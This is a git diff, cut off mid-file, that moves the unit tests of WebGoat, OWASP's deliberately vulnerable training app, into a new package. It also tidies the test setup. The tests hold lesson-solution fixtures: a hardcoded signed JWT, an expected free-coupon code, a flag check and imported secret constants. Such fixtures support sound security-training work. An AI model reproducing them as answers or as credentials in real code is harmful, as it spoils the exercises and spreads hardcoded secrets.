--- a/webgoat-lessons/client-side-filtering/src/test/java/org/owasp/webgoat/client_side_filtering/ShopEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/client_side_filtering/ShopEndpointTest.java
@@ -20,19 +20,20 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.client_side_filtering;
+package org.owasp.webgoat.lessons.client_side_filtering;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.client_side_filtering.ShopEndpoint;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
 import static org.hamcrest.Matchers.is;
-import static org.owasp.webgoat.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
+import static org.owasp.webgoat.lessons.client_side_filtering.ClientSideFilteringFreeAssignment.SUPER_COUPON_CODE;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
@@ -47,8 +48,7 @@ public class ShopEndpointTest extends LessonTest {
 
     @BeforeEach
     public void setup() {
-        ShopEndpoint shopEndpoint = new ShopEndpoint();
-        this.mockMvc = standaloneSetup(shopEndpoint).build();
+        this.mockMvc = standaloneSetup(new ShopEndpoint()).build();
     }
 
     @Test
@@ -78,4 +78,4 @@ public class ShopEndpointTest extends LessonTest {
                 .andExpect(jsonPath("$.codes[3].code", is("get_it_for_free")));
     }
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/crypto/src/test/java/org/owasp/webgoat/crypto/CryptoUtilTest.java b/src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java
similarity index 95%
rename from webgoat-lessons/crypto/src/test/java/org/owasp/webgoat/crypto/CryptoUtilTest.java
rename to src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java
index 52e8cdc5b..4e46cc406 100644
--- a/webgoat-lessons/crypto/src/test/java/org/owasp/webgoat/crypto/CryptoUtilTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/cryptography/CryptoUtilTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.crypto;
+package org.owasp.webgoat.lessons.cryptography;
 
 import lombok.extern.slf4j.Slf4j;
 import org.junit.jupiter.api.Test;
@@ -30,4 +30,4 @@ public class CryptoUtilTest {
 		}
 	}
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/csrf/src/test/java/org/owasp/webgoat/csrf/CSRFFeedbackTest.java b/src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java
similarity index 93%
rename from webgoat-lessons/csrf/src/test/java/org/owasp/webgoat/csrf/CSRFFeedbackTest.java
rename to src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java
index adc67fdbb..75fa827fd 100644
--- a/webgoat-lessons/csrf/src/test/java/org/owasp/webgoat/csrf/CSRFFeedbackTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/csrf/CSRFFeedbackTest.java
@@ -20,13 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.csrf;
+package org.owasp.webgoat.lessons.csrf;
 
 import org.hamcrest.core.StringContains;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.csrf.CSRF;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
@@ -44,15 +45,11 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
  * @author nbaars
  * @since 11/17/17.
  */
-@ExtendWith(SpringExtension.class)
 public class CSRFFeedbackTest extends LessonTest {
 
-    @Autowired
-    private CSRF csrf;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(csrf);
+        when(webSession.getCurrentLesson()).thenReturn(new CSRF());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -76,4 +73,4 @@ public class CSRFFeedbackTest extends LessonTest {
                 .andExpect(jsonPath("lessonCompleted", is(true)))
                 .andExpect(jsonPath("feedback", StringContains.containsString("the flag is: ")));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java b/src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java
similarity index 92%
rename from webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
rename to src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java
index 9e98af7d1..1840ce0b9 100644
--- a/webgoat-lessons/insecure-deserialization/src/test/java/org/owasp/webgoat/deserialization/DeserializeTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/deserialization/DeserializeTest.java
@@ -1,4 +1,4 @@
-package org.owasp.webgoat.deserialization;
+package org.owasp.webgoat.lessons.deserialization;
 
 import org.dummy.insecure.framework.VulnerableTaskHolder;
 import org.hamcrest.CoreMatchers;
@@ -6,7 +6,7 @@ import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -55,7 +55,7 @@ class DeserializeTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .param("token", token))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.invalidversion"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.invalidversion"))))
                 .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
 
@@ -65,7 +65,7 @@ class DeserializeTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .param("token", token))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.expired"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.expired"))))
                 .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
 
@@ -75,7 +75,7 @@ class DeserializeTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/InsecureDeserialization/task")
                 .param("token", token))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("insecure-deserialization.stringobject"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("insecure-deserialization.stringobject"))))
                 .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java b/src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java
similarity index 93%
rename from webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java
rename to src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java
index 19743825b..5074b23ea 100644
--- a/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/HijackSessionAssignmentTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/hijacksession/HijackSessionAssignmentTest.java
@@ -20,7 +20,23 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession;
+package org.owasp.webgoat.lessons.hijacksession;
+
+import org.hamcrest.CoreMatchers;
+import org.junit.jupiter.api.BeforeEach;
+import org.junit.jupiter.api.Test;
+import org.junit.jupiter.api.extension.ExtendWith;
+import org.mockito.Mock;
+import org.mockito.junit.jupiter.MockitoExtension;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.hijacksession.cas.Authentication;
+import org.owasp.webgoat.lessons.hijacksession.cas.HijackSessionAuthenticationProvider;
+import org.springframework.test.util.ReflectionTestUtils;
+import org.springframework.test.web.servlet.MockMvc;
+import org.springframework.test.web.servlet.ResultActions;
+import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
+
+import javax.servlet.http.Cookie;
 
 import static org.hamcrest.Matchers.emptyString;
 import static org.hamcrest.Matchers.not;
@@ -30,22 +46,6 @@ import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.setup.MockMvcBuilders.standaloneSetup;
 
-import javax.servlet.http.Cookie;
-
-import org.hamcrest.CoreMatchers;
-import org.junit.jupiter.api.BeforeEach;
-import org.junit.jupiter.api.Test;
-import org.junit.jupiter.api.extension.ExtendWith;
-import org.mockito.Mock;
-import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
-import org.owasp.webgoat.hijacksession.cas.Authentication;
-import org.owasp.webgoat.hijacksession.cas.HijackSessionAuthenticationProvider;
-import org.springframework.test.util.ReflectionTestUtils;
-import org.springframework.test.web.servlet.MockMvc;
-import org.springframework.test.web.servlet.ResultActions;
-import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
-
 /***
  *
  * @author Angel Olle Blazquez
diff --git a/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java b/src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
similarity index 93%
rename from webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
rename to src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
index 1ccaf5e01..23bed9dce 100644
--- a/webgoat-lessons/hijack-session/src/test/java/org/owasp/webgoat/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/hijacksession/cas/HijackSessionAuthenticationProviderTest.java
@@ -21,7 +21,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.hijacksession.cas;
+package org.owasp.webgoat.lessons.hijacksession.cas;
 
 import static org.hamcrest.CoreMatchers.is;
 import static org.hamcrest.CoreMatchers.not;
@@ -35,7 +35,9 @@ import org.junit.jupiter.api.Test;
 import org.junit.jupiter.params.ParameterizedTest;
 import org.junit.jupiter.params.provider.Arguments;
 import org.junit.jupiter.params.provider.MethodSource;
-import org.owasp.webgoat.hijacksession.cas.Authentication.AuthenticationBuilder;
+import org.owasp.webgoat.lessons.hijacksession.cas.Authentication;
+import org.owasp.webgoat.lessons.hijacksession.cas.Authentication.AuthenticationBuilder;
+import org.owasp.webgoat.lessons.hijacksession.cas.HijackSessionAuthenticationProvider;
 
 /***
  *
diff --git a/webgoat-lessons/http-proxies/src/test/java/org/owasp/webgoat/http_proxies/HttpBasicsInterceptRequestTest.java b/src/test/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequestTest.java
similarity index 89%
rename from webgoat-lessons/http-proxies/src/test/java/org/owasp/webgoat/http_proxies/HttpBasicsInterceptRequestTest.java
rename to src/test/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequestTest.java
index 564fb0267..5f12fac26 100644
--- a/webgoat-lessons/http-proxies/src/test/java/org/owasp/webgoat/http_proxies/HttpBasicsInterceptRequestTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/http_proxies/HttpBasicsInterceptRequestTest.java
@@ -20,14 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.http_proxies;
+package org.owasp.webgoat.lessons.http_proxies;
 
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
 import org.mockito.junit.jupiter.MockitoExtension;
-import org.owasp.webgoat.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.container.assignments.AssignmentEndpointTest;
+import org.owasp.webgoat.lessons.http_proxies.HttpBasicsInterceptRequest;
 import org.springframework.test.web.servlet.MockMvc;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
 
@@ -53,7 +54,7 @@ public class HttpBasicsInterceptRequestTest extends AssignmentEndpointTest {
                 .header("x-request-intercepted", "true")
                 .param("changeMe", "Requests are tampered easily"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("http-proxies.intercept.success"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.success"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(true)));
     }
 
@@ -63,7 +64,7 @@ public class HttpBasicsInterceptRequestTest extends AssignmentEndpointTest {
                 .header("x-request-intercepted", "false")
                 .param("changeMe", "Requests are tampered easily"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("http-proxies.intercept.failure"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
@@ -72,7 +73,7 @@ public class HttpBasicsInterceptRequestTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
                 .header("x-request-intercepted", "false"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("http-proxies.intercept.failure"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
@@ -81,7 +82,7 @@ public class HttpBasicsInterceptRequestTest extends AssignmentEndpointTest {
         mockMvc.perform(MockMvcRequestBuilders.get("/HttpProxies/intercept-request")
                 .param("changeMe", "Requests are tampered easily"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("http-proxies.intercept.failure"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
 
@@ -91,7 +92,7 @@ public class HttpBasicsInterceptRequestTest extends AssignmentEndpointTest {
                 .header("x-request-intercepted", "true")
                 .param("changeMe", "Requests are tampered easily"))
                 .andExpect(status().isOk())
-                .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("http-proxies.intercept.failure"))))
+                .andExpect(jsonPath("$.feedback", CoreMatchers.is(pluginMessages.getMessage("http-proxies.intercept.failure"))))
                 .andExpect(jsonPath("$.lessonCompleted", CoreMatchers.is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTDecodeEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java
similarity index 87%
rename from webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTDecodeEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java
index 3119c97cd..45ee41a7b 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTDecodeEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTDecodeEndpointTest.java
@@ -1,9 +1,10 @@
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.jwt.JWT;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -14,15 +15,11 @@ import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class JWTDecodeEndpointTest extends LessonTest {
 
-    @Autowired
-    private JWT jwt;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(jwt);
+        when(webSession.getCurrentLesson()).thenReturn(new JWT());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -43,4 +40,4 @@ public class JWTDecodeEndpointTest extends LessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.lessonCompleted", is(false)));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTFinalEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java
similarity index 91%
rename from webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTFinalEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java
index f09693c71..3fadcb10c 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTFinalEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTFinalEndpointTest.java
@@ -1,11 +1,13 @@
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.Jwts;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.jwt.JWT;
+import org.owasp.webgoat.lessons.jwt.JWTFinalEndpoint;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -21,20 +23,13 @@ import static org.mockito.Mockito.when;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class JWTFinalEndpointTest extends LessonTest {
 
     private static final String TOKEN_JERRY = "eyJraWQiOiJ3ZWJnb2F0X2tleSIsImFsZyI6IkhTNTEyIn0.eyJhdWQiOiJ3ZWJnb2F0Lm9yZyIsImVtYWlsIjoiamVycnlAd2ViZ29hdC5jb20iLCJ1c2VybmFtZSI6IkplcnJ5In0.xBc5FFwaOcuxjdr_VJ16n8Jb7vScuaZulNTl66F2MWF1aBe47QsUosvbjWGORNcMPiPNwnMu1Yb0WZVNrp2ZXA";
 
-    @Autowired
-    private JWT jwt;
-    
-    @Autowired
-    private JWTFinalEndpoint jwtFinalEndpoint;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(jwt);
+        when(webSession.getCurrentLesson()).thenReturn(new JWT());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
     }
 
@@ -73,4 +68,4 @@ public class JWTFinalEndpointTest extends LessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTRefreshEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java
similarity index 97%
rename from webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTRefreshEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java
index f80cf95e5..0ecdaa28b 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTRefreshEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTRefreshEndpointTest.java
@@ -20,14 +20,15 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import com.fasterxml.jackson.databind.ObjectMapper;
 import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.jwt.JWT;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
@@ -40,19 +41,15 @@ import java.util.Map;
 
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.jwt.JWTRefreshEndpoint.PASSWORD;
+import static org.owasp.webgoat.lessons.jwt.JWTRefreshEndpoint.PASSWORD;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class JWTRefreshEndpointTest extends LessonTest {
 
-    @Autowired
-    private JWT jwt;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(jwt);
+        when(webSession.getCurrentLesson()).thenReturn(new JWT());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -213,4 +210,4 @@ public class JWTRefreshEndpointTest extends LessonTest {
         mockMvc.perform(MockMvcRequestBuilders.post("/JWT/refresh/login"))
                 .andExpect(status().isUnauthorized());
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java
similarity index 95%
rename from webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java
index 0ab2e5bc3..b99b9f828 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTSecretKeyEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTSecretKeyEndpointTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.Jwts;
@@ -28,7 +28,8 @@ import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.jwt.JWT;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
 import org.springframework.test.web.servlet.request.MockMvcRequestBuilders;
@@ -41,19 +42,15 @@ import java.util.Date;
 import static io.jsonwebtoken.SignatureAlgorithm.HS512;
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.jwt.JWTSecretKeyEndpoint.JWT_SECRET;
+import static org.owasp.webgoat.lessons.jwt.JWTSecretKeyEndpoint.JWT_SECRET;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class JWTSecretKeyEndpointTest extends LessonTest {
 
-    @Autowired
-    private JWT jwt;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(jwt);
+        when(webSession.getCurrentLesson()).thenReturn(new JWT());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -139,4 +136,4 @@ public class JWTSecretKeyEndpointTest extends LessonTest {
                 .andExpect(status().isOk())
                 .andExpect(jsonPath("$.feedback", CoreMatchers.is(messages.getMessage("jwt-invalid-token"))));
     }
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTVotesEndpointTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
similarity index 97%
rename from webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTVotesEndpointTest.java
rename to src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
index af14f4ebd..8cca4a7cf 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/JWTVotesEndpointTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/JWTVotesEndpointTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import com.fasterxml.jackson.databind.ObjectMapper;
 import io.jsonwebtoken.Claims;
@@ -29,7 +29,8 @@ import org.hamcrest.CoreMatchers;
 import org.junit.jupiter.api.BeforeEach;
 import org.junit.jupiter.api.Test;
 import org.junit.jupiter.api.extension.ExtendWith;
-import org.owasp.webgoat.plugins.LessonTest;
+import org.owasp.webgoat.container.plugins.LessonTest;
+import org.owasp.webgoat.lessons.jwt.JWT;
 import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.http.MediaType;
 import org.springframework.test.context.junit.jupiter.SpringExtension;
@@ -44,20 +45,16 @@ import static org.assertj.core.api.Assertions.assertThat;
 import static org.hamcrest.Matchers.containsString;
 import static org.hamcrest.Matchers.is;
 import static org.mockito.Mockito.when;
-import static org.owasp.webgoat.jwt.JWTVotesEndpoint.JWT_PASSWORD;
+import static org.owasp.webgoat.lessons.jwt.JWTVotesEndpoint.JWT_PASSWORD;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.cookie;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.jsonPath;
 import static org.springframework.test.web.servlet.result.MockMvcResultMatchers.status;
 
-@ExtendWith(SpringExtension.class)
 public class JWTVotesEndpointTest extends LessonTest {
 
-    @Autowired
-    private JWT jwt;
-
     @BeforeEach
     public void setup() {
-        when(webSession.getCurrentLesson()).thenReturn(jwt);
+        when(webSession.getCurrentLesson()).thenReturn(new JWT());
         this.mockMvc = MockMvcBuilders.webAppContextSetup(this.wac).build();
         when(webSession.getUserName()).thenReturn("unit-test");
     }
@@ -207,4 +204,4 @@ public class JWTVotesEndpointTest extends LessonTest {
     }
 
 
-}
\ No newline at end of file
+}
diff --git a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/TokenTest.java b/src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java
similarity index 98%
rename from webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/TokenTest.java
rename to src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java
index 9e1b13dbe..577688400 100644
--- a/webgoat-lessons/jwt/src/test/java/org/owasp/webgoat/jwt/TokenTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/jwt/TokenTest.java
@@ -20,7 +20,7 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
  */
 
-package org.owasp.webgoat.jwt;
+package org.owasp.webgoat.lessons.jwt;
 
 import io.jsonwebtoken.Claims;
 import io.jsonwebtoken.JwsHeader;
diff --git a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java b/src/test/java/org/owasp/webgoat/lessons/missing_ac/DisplayUserTest.java
similarity index 87%
rename from webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java
rename to src/test/java/org/owasp/webgoat/lessons/missing_ac/DisplayUserTest.java
index a4bf62910..372c2b8df 100644
--- a/webgoat-lessons/missing-function-ac/src/test/java/org/owasp/webgoat/missing_ac/DisplayUserTest.java
+++ b/src/test/java/org/owasp/webgoat/lessons/missing_ac/DisplayUserTest.java
@@ -20,12 +20,14 @@
  * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
